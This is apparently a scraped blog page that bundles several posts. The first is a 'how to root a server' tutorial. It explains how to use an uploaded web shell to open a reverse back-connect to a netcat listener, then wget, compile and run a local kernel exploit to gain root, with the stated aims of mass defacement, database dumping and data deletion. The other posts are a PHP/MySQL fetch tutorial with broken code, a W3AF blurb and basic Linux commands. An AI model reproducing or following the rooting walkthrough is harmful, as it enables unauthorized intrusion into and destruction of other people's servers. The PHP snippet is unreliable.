CCCN Internal Seminars Website

welcome to enistain's world

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).

We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).

In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.

After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to

find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.

You can know that from your shell, for example, this version is 2.6.18 – 2012

Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.

Now how to find the local root.

You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :

Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.

So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.

After that Follow the steps :

1- Press nc -vlp 433

2- Wget [the link of the local-Root.zip]

3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local

gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)

Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.

AFTER THE ROOT

As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.

Continue reading

welcome to enistain's world

Welcome to my another PHP and MYSQL tutorial. In the previous I've discussed about the data insertion into database by using PHP and MYSQL. So i did successfully in the previous video.

In this video tutorial I'll discuss How to fetch data from the database called as data fetching. It's really a simple thing to access your data which is in database. You just have to do a little work for this. For fetching data you have follow some steps.

How to Fetch Data from Database

Step 1:

Make a connection with your database which i did in the previous blog.

Step 2:

If you wanna fetching a values in "form" or in a table so just have to create a form, table or whatever you want in HTML. I've created a table where I'll show you how to fetch data in table form.

Step 3:

Write a query SELECT * FROM table_Name;

Step 4:

Create a Loop for fetching all the data on a single click.

Step 5:

Create variables for the sake of storing a different values from the combined values in the loop variable like:

//while loop to fetch all the values from the database and stored in the variable named "row".

while($row = mysql_fetch_array(mysql_query($conn,$query))){

$name = $row['username']; //$name will save all the username values from the loop variable 'row'.

$pass = $row['password']; //$pass will save the password values from the loop variable 'row'.

}

Now watch the video for better understanding.

More articles

welcome to enistain's world

"W3AF is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is currently hosted at SourceForge." read more...

Website: http://w3af.sourceforge.net

Related posts

welcome to enistain's world

In this concise article we will learn some basics of how to use Linux Command line, so lets get started.

Requirements:

1. An open Terminal in your Linux Box. I'm using Kali Linux 2.0
or you can check out this amazing website Webminal

Command: ls
Syntax:    ls [flag(s)]
Function: ls is short for list. ls command is used to list the contents of a directory these contents include files, folders, and links. ls has many optional flags as well, some of them are described below
Flags: -a this flag is used to view hidden files that is those files whose names are preceded   by a '.'(dot)
-l this flag is used to view file permissions, owner of the file, group of the owner, the file size, the modification date, and the filename. We'll talk more about it in later articles.

Command: mkdir
Syntax:   mkdir dirname
Function: mkdir is used to create a directory (or a folder) with the name which is followed by the command

now lets create a directory in our current directory named as myfiles, how would you do that?

mkdir myfiles

which command should we use in order to verify that the directory has been created in our current folder?

ls

this will list all the files and directories in our current folder. Do you see myfiles directory listed?

Command: cd
Syntax:   cd path/to/directory
Function: cd is short for change directory. It is used to navigate directories, or to make it clear it does the same thing as what double clicking on a folder do except it doesn't show you contents of the directory :(. In order to navigate or visit another directory we need to provide it's ABSOLUTE-PATH or RELATIVE-PATH you heard that, didn't ya?

Paths are of two types relative path or absolute path (also called full-path). Relative as the name suggests is relative to the current directory, so if you have to navigate to a folder within the current directory you'll just simply type cd directory_name. But what if you have to navigate to a directory which is the parent of current directory? Well it's easy just type cd .. (yes double dots, you noticed that .. and . thing when you typed ls -a, didn't you?). The double dots mean the directory above current directory (i,e the parent directory) and a single dot means the current directory (i,e the directory that I'm currently in). Now if you have to navigate two directories above current directory using relative path navigation you'll type

cd ../..

here .. means previous directory and another .. after slash (/) means the previous directory of the previous directory sounds confusing..!

The Absolute Path means full path to the file or folder which starts from root directory. Say I want to navigate to my home folder using absolute path, then I'll type:

cd /home/user

where user is the username
Now think of navigating to the myfiles folder from your home directory using the absolute path, it will be something like this:

cd /home/user/myfiles

Exercise: Create a directory project1 inside your home directory and inside the project1 directory create a file and a directory named index.html and css respectively. Then navigate to the css directory and create a style.css file inside it. At last navigate out of the css directory to home both using the relative and absolute path mechanisms.

[Trick: To get quickly out of any directory to your home directory type cd ~ [press Enter] or simply cd [press Enter]]

Command: touch
Syntax: touch filename
Function: touch is a nifty little function used to create an empty file (actually it's used to change access time of a file but everyone has got bad habits :P ). You can create any type of empty file with the touch command. If you are a bit curious about touch read the manual page of the touch command using the man touch command.

Now lets create a few files inside of our myfiles directory

touch file1 file2 file3

The above command creates three empty files in our current directory named file1, file2, and file3.
How will you verify that it has indeed created these three files in your current directory? I won't answer this time.

Command: echo
Syntax: echo Hacker manufacturing under process
Function: echo is used to display a line of text. By default echo displays a line of text on the terminal which is the standard output device (stdout for short). However we can redirect the output of an echo command to a file using > (the greater than symbol).
Now if we have to echo a line of text to a file, say file1 in our myfiles directory, we will type:

echo This is file1 > file1

The above command will echo the text "This is file1" to file1.

Command: cat
Syntax: cat filename [anotherfilename...]
Function: cat stands for concatenate (not that puny little creature in your house). The main function of cat is to concatenate files and display them on your terminal (or in geeky terms stdout). But its also used to display the contents of a file on your terminal.

Let's display the contents of file1 in the myfiles directory that we echoed to it using the echo command, for that we'll type:

cat file1

Awesome I can see on black screen contents of my file (what if your terminals background is white?), looks like I'm becoming a hacker. In case you don't see it then I suggest you should give up the thought of becoming a hacker. Just kidding you might have missed a step or two from the above steps that we performed.

Now lets say that we want to add another line of text to our file using the echo command should we use the same greater than (>) symbol? No, if we want to add another line (which in geeky terms is to append a line) to our file using the echo command we have to use >> (two greater than symbols) like this:

echo Another line of text >> file1

now to check the contents of file1 we'll type:

cat file1

OK we wrote two lines inside of the file1.
Does it mean we have to add three greater than symbols to write third line? Oh! I didn't thought you'd be such a genius.

A single greater than symbol (>) means redirect the output of the preceding command to a file specified after the > symbol. If the file exists then overwrite everything that's in it with the new contents and if the file does not exist then create one and write to it the output of the preceding command. So if you had typed

echo Another line of text > file1

it would have overwritten the contents of the file1 with "Another line of text" and the line "This is file1" would no longer be present in the file.

Two greater than symbols (>>) mean that append (remember the geeky term?) the output of the previous command to the end of file specified after >>. Now if you want to add another line of text to file1, you won't use >>> rather you'll use >> like this:

echo Third line in file1 >> file1

This is it for today. But don't worry we'll learn more things soon.

CCCN Internal Seminars Website

Monday, June 5, 2023

HOW TO ROOT A SERVER? – SERVER ROOTING

HOW TO ROOT A SERVER?

HOW TO SEARCH LOCAL ROOT?

HOW TO GET ROOT ACCESS?

How To Fetch Data From The Database | Tutorial 4

How to Fetch Data from Database

Sunday, June 4, 2023

W3AF

Linux Command Line Hackery Series: Part 1

Requirements:

More articles